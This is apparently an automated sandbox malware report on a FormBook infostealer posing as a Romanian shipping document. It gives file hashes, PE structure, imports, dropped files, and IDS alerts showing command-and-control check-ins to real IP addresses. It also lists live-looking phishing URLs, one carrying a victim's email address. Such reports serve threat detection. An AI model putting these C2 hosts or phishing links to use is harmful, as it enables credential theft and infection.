	Fantazy.arm7.elf	Get hash	malicious	Mirai	Browse	18.153.246.29
	W-2Updated.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	13.227.8.87
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Get hash	malicious	HTMLPhisher	Browse	13.227.8.47
	https://sendgb.com/vdRYC6Nal34?utm_medium=HlyZfLISdD8Bj1i	Get hash	malicious	Unknown	Browse	52.19.235.127
	https://reviewgustereports.com/	Get hash	malicious	CAPTCHA Scam ClickFix, XWorm	Browse	13.227.8.6

Process:	C:\Windows\SysWOW64\sc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autEEC2.tmp

Download File

Process:	C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe
File Type:	data
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	7.99403093817866
Encrypted:	true
SSDEEP:	6144:feClJxwfpIUKvG76ljYfbPMsoBKySkcwzruMVqJAgo1CcYhgl:Dlcya0ji3yLrPVqJAXCcR
MD5:	460459265DCF5F9E020C973C438CE25B
SHA1:	099C2C8DA166083C11795E832FB02C37C4851B53
SHA-256:	812EA4A917ABD0FCEB43F836E68BFB5B868D61AD7DE67E471EE5FDB57FDC3F56
SHA-512:	DDA91475CC615CA62C341C5765F9D691B876A53719D394FF66B1F08FD3570B741C4528F272954B274D5436DCDEAC20DC1EDE6C9090BA8075FC854F3C95D62DB7
Malicious:	false
Reputation:	low
Preview:	.j.LT58COR9K..YQ.LTOQL7PpWLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQF.QHLZP.B7.9.m.4t.j.Q""f)#'+&.<lT1^9##.Z&k L%q/7q...o<#S5.ZA].8CKR9KQ?XX.q4(.qW7.j,0."...+6.C..h/6.-...p7R.."1Qv1!.QHLTOQL7.uWL.49C.>D.QFYQHLTO.L5Q;VGW5dGKR9KQFYQH.GOQL'P0W<S58C.R9[QFYSHLROQL7P0WJW58CKR9K!BYQJLTOQL7R0..W5(CKB9KQFIQH\TOQL7P WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLz;44CP0W..18C[R9K.BYQXLTOQL7P0WLW58CkR9+QFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9

C:\Users\user\AppData\Local\Temp\totten

Download File

Process:	C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe
File Type:	data
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	7.99403093817866
Encrypted:	true
SSDEEP:	6144:feClJxwfpIUKvG76ljYfbPMsoBKySkcwzruMVqJAgo1CcYhgl:Dlcya0ji3yLrPVqJAXCcR
MD5:	460459265DCF5F9E020C973C438CE25B
SHA1:	099C2C8DA166083C11795E832FB02C37C4851B53
SHA-256:	812EA4A917ABD0FCEB43F836E68BFB5B868D61AD7DE67E471EE5FDB57FDC3F56
SHA-512:	DDA91475CC615CA62C341C5765F9D691B876A53719D394FF66B1F08FD3570B741C4528F272954B274D5436DCDEAC20DC1EDE6C9090BA8075FC854F3C95D62DB7
Malicious:	false
Preview:	.j.LT58COR9K..YQ.LTOQL7PpWLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQF.QHLZP.B7.9.m.4t.j.Q""f)#'+&.<lT1^9##.Z&k L%q/7q...o<#S5.ZA].8CKR9KQ?XX.q4(.qW7.j,0."...+6.C..h/6.-...p7R.."1Qv1!.QHLTOQL7.uWL.49C.>D.QFYQHLTO.L5Q;VGW5dGKR9KQFYQH.GOQL'P0W<S58C.R9[QFYSHLROQL7P0WJW58CKR9K!BYQJLTOQL7R0..W5(CKB9KQFIQH\TOQL7P WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLz;44CP0W..18C[R9K.BYQXLTOQL7P0WLW58CkR9+QFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9KQFYQHLTOQL7P0WLW58CKR9

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.19663805092333
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	AWB_5771388044 Documente de expediere.exe
File size:	1'214'976 bytes
MD5:	825d275e4ba1c2da11bdc94259b23c21
SHA1:	d2fd31c97cf80b548d59156e6b21cfae5c86d79a
SHA256:	21e6cc3d9b767a7b76243e8501064e94153ebed3098ec68ae05b534bbc39de4c
SHA512:	1642b4835ae1fa5035fb60d3fdeff9c94fdfba3d2b89a1639d40c73914172d37e8b9a561fd42486c0668caf7c935847098203c5cb1fd52e1e99dd5a507d9aa25
SSDEEP:	24576:xu6J33O0c+JY5UZ+XC0kGso6Faqha3hZShaZMuTbcanVWY:ju0c++OCvkGs9FaqIxIyZAY
TLSH:	E045CF2273DDC361CB769273BF2AB7016EBB7C614630B85B2F880D79A950172162D763
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67564B0C [Mon Dec 9 01:42:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FDB007A549Ah
jmp 00007FDB00798264h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FDB007983EAh
cmp edi, eax
jc 00007FDB0079874Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FDB007983E9h
rep movsb
jmp 00007FDB007986FCh
cmp ecx, 00000080h
jc 00007FDB007985B4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FDB007983F0h
bt dword ptr [004BE324h], 01h
jc 00007FDB007988C0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FDB0079858Dh
test edi, 00000003h
jne 00007FDB0079859Eh
test esi, 00000003h
jne 00007FDB0079857Dh
bt edi, 02h
jnc 00007FDB007983EFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FDB007983F3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FDB00798445h
bt esi, 03h
jnc 00007FDB00798498h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x60144	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x128000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x60144	0x60200	60adca01a114991f19c9765dd47b4d32	False	0.9316812621911573	data	7.9022176692791435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x128000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x57409	data			1.0003245799348042
RT_GROUP_ICON	0x126bc4	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x126c3c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x126c50	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x126c64	0x14	data	English	Great Britain	1.25
RT_VERSION	0x126c78	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x126d54	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-09T17:18:57.391536+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49889	108.179.253.197	80	TCP
2024-12-09T17:18:57.391536+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.9	49889	108.179.253.197	80	TCP
2024-12-09T17:19:13.971844+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49925	108.181.189.7	80	TCP
2024-12-09T17:19:16.822172+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49932	108.181.189.7	80	TCP
2024-12-09T17:19:19.599532+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49940	108.181.189.7	80	TCP
2024-12-09T17:19:22.108468+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49948	108.181.189.7	80	TCP
2024-12-09T17:19:22.108468+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.9	49948	108.181.189.7	80	TCP
2024-12-09T17:19:28.863895+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49964	13.248.169.48	80	TCP
2024-12-09T17:19:31.511484+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49970	13.248.169.48	80	TCP
2024-12-09T17:19:34.349171+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49977	13.248.169.48	80	TCP
2024-12-09T17:19:37.014753+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49983	13.248.169.48	80	TCP
2024-12-09T17:19:37.014753+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.9	49983	13.248.169.48	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 17:18:55.999192953 CET	49889	80	192.168.2.9	108.179.253.197
Dec 9, 2024 17:18:56.118805885 CET	80	49889	108.179.253.197	192.168.2.9
Dec 9, 2024 17:18:56.118912935 CET	49889	80	192.168.2.9	108.179.253.197
Dec 9, 2024 17:18:56.129973888 CET	49889	80	192.168.2.9	108.179.253.197
Dec 9, 2024 17:18:56.249298096 CET	80	49889	108.179.253.197	192.168.2.9
Dec 9, 2024 17:18:57.335977077 CET	80	49889	108.179.253.197	192.168.2.9
Dec 9, 2024 17:18:57.391535997 CET	49889	80	192.168.2.9	108.179.253.197
Dec 9, 2024 17:19:02.336172104 CET	80	49889	108.179.253.197	192.168.2.9
Dec 9, 2024 17:19:02.336291075 CET	49889	80	192.168.2.9	108.179.253.197
Dec 9, 2024 17:19:02.337657928 CET	49889	80	192.168.2.9	108.179.253.197
Dec 9, 2024 17:19:02.523320913 CET	80	49889	108.179.253.197	192.168.2.9
Dec 9, 2024 17:19:12.681854010 CET	49925	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:12.801537991 CET	80	49925	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:12.801614046 CET	49925	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:12.816802979 CET	49925	80	192.168.2.9	108.181.189.7
